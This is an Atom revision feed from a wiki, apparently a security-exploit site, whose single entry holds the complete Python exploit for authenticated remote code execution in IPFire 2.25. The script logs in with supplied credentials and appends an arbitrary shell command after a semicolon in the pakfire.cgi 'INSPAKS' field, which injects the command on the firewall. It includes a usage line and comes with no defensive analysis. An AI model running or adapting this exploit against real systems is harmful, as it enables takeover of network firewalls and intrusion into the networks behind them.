<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=IPFire_2.25_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E</id>
	<title>IPFire 2.25 遠程代碼執行漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=IPFire_2.25_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=IPFire_2.25_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-10T14:31:15Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=IPFire_2.25_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=2884&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==EXP== &lt;pre&gt; # Exploit Title: IPFire 2.25 - Remote Code Execution (Authenticated) # Date: 15/05/2021 # Exploit Author: Mücahit Saratar # Vendor Homepage: https://www.ipfire....&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=IPFire_2.25_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=2884&amp;oldid=prev"/>
		<updated>2021-05-17T10:18:52Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==EXP== &amp;lt;pre&amp;gt; # Exploit Title: IPFire 2.25 - Remote Code Execution (Authenticated) # Date: 15/05/2021 # Exploit Author: Mücahit Saratar # Vendor Homepage: https://www.ipfire....&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Exploit Title: IPFire 2.25 - Remote Code Execution (Authenticated)&lt;br /&gt;
# Date: 15/05/2021&lt;br /&gt;
# Exploit Author: Mücahit Saratar&lt;br /&gt;
# Vendor Homepage: https://www.ipfire.org/&lt;br /&gt;
# Software Link: https://downloads.ipfire.org/releases/ipfire-2.x/2.25-core156/ipfire-2.25.x86_64-full-core156.iso&lt;br /&gt;
# Version: 2.25 - core update 156&lt;br /&gt;
# Tested on: parrot os 5.7.0-2parrot2-amd64&lt;br /&gt;
&lt;br /&gt;
#!/usr/bin/python3&lt;br /&gt;
&lt;br /&gt;
import requests as R&lt;br /&gt;
import sys&lt;br /&gt;
import base64&lt;br /&gt;
&lt;br /&gt;
try:&lt;br /&gt;
    host = sys.argv[1]&lt;br /&gt;
    assert host[:4] == &amp;quot;http&amp;quot; and host[-1] != &amp;quot;/&amp;quot;&lt;br /&gt;
    url = host + &amp;quot;/cgi-bin/pakfire.cgi&amp;quot;&lt;br /&gt;
    username = sys.argv[2]&lt;br /&gt;
    password = sys.argv[3]&lt;br /&gt;
    komut = sys.argv[4]&lt;br /&gt;
except:&lt;br /&gt;
    print(f&amp;quot;{sys.argv[0]} http://target.com:444 username password command&amp;quot;)&lt;br /&gt;
    exit(1)&lt;br /&gt;
&lt;br /&gt;
veri = { &lt;br /&gt;
        &amp;quot;INSPAKS&amp;quot;: f&amp;quot;7zip;{komut}&amp;quot;,&lt;br /&gt;
        &amp;quot;ACTION&amp;quot;:&amp;quot;install&amp;quot;,&lt;br /&gt;
        &amp;quot;x&amp;quot;: &amp;quot;10&amp;quot;,&lt;br /&gt;
        &amp;quot;y&amp;quot;: &amp;quot;6&amp;quot; }&lt;br /&gt;
token = b&amp;quot;Basic &amp;quot; + base64.b64encode(f&amp;quot;{username}:{password}&amp;quot;.encode())&lt;br /&gt;
header = {&amp;quot;Authorization&amp;quot;: token,&lt;br /&gt;
        &amp;quot;Connection&amp;quot;: &amp;quot;close&amp;quot;,&lt;br /&gt;
        &amp;quot;Cache-Control&amp;quot;: &amp;quot;max-age=0&amp;quot;,&lt;br /&gt;
        &amp;quot;User-Agent&amp;quot;: &amp;quot;Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36&amp;quot;,&lt;br /&gt;
        &amp;quot;Origin&amp;quot;: host,&lt;br /&gt;
        &amp;quot;Sec-GPC&amp;quot;: &amp;quot;1&amp;quot;,&lt;br /&gt;
        &amp;quot;Sec-Fetch-Site&amp;quot;: &amp;quot;same-origin&amp;quot;,&lt;br /&gt;
        &amp;quot;Sec-Fetch-Mode&amp;quot;: &amp;quot;navigate&amp;quot;,&lt;br /&gt;
        &amp;quot;Sec-Fetch-User&amp;quot;: &amp;quot;?1&amp;quot;,&lt;br /&gt;
        &amp;quot;Sec-Fetch-Dest&amp;quot;: &amp;quot;document&amp;quot;,&lt;br /&gt;
        &amp;quot;Referer&amp;quot;: host}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
R.post(url, data=veri, headers=header, verify=False)&lt;br /&gt;
print(&amp;quot;Done.&amp;quot;)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>